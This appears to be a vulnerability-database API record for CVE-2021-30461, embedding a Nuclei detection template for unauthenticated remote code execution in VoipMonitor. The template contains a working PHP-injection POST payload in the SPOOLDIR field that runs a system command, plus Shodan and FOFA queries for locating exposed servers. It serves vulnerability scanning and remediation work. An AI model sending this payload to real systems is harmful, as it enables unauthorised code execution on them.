{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-30461/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-30461/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-30461/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-30461/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-30461/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-30461"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-30461"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-30461.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2021-30461\n\ninfo:\n  name: VoipMonitor <24.61 - Remote Code Execution\n  author: shifacyclewala,hackergautam\n  severity: critical\n  description: |\n    VoipMonitor prior to 24.61 is susceptible to remote code execution vulnerabilities because of its use of user supplied data via its web interface, allowing  remote unauthenticated users to trigger a remote PHP code execution vulnerability.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n  remediation: |\n    Upgrade VoipMonitor to version 24.61 or later to mitigate this vulnerability.\n  reference:\n    - https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-30461\n    - https://ssd-disclosure.com/ssd-advisory--voipmonitor-unauth-rce\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/openx-org/BLEN\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-30461\n    cwe-id: CWE-94\n    epss-score: 0.36632\n    epss-percentile: 0.98432\n    cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: voipmonitor\n    product: voipmonitor\n    shodan-query:\n      - http.title:\"VoIPmonitor\"\n      - http.title:\"voipmonitor\"\n    fofa-query: title=\"voipmonitor\"\n    google-query: intitle:\"voipmonitor\"\n  tags: cve2021,cve,rce,voipmonitor,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /index.php HTTP/1.1\n        Host: {{Hostname}}\n        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n        Content-Type: application/x-www-form-urlencoded\n\n        SPOOLDIR=test\".system(id).\"&recheck=Recheck\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"uid=\"\n          - \"gid=\"\n          - \"groups=\"\n          - \"VoIPmonitor installation\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502207766dceec155594f636fd06cfadd7027050dcbc53d713569aef9128bd0c70a8a022100c3f822fe89f09434f4c15b20487cc5033b294923a666a89e404405f1976fd141:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-30461"
}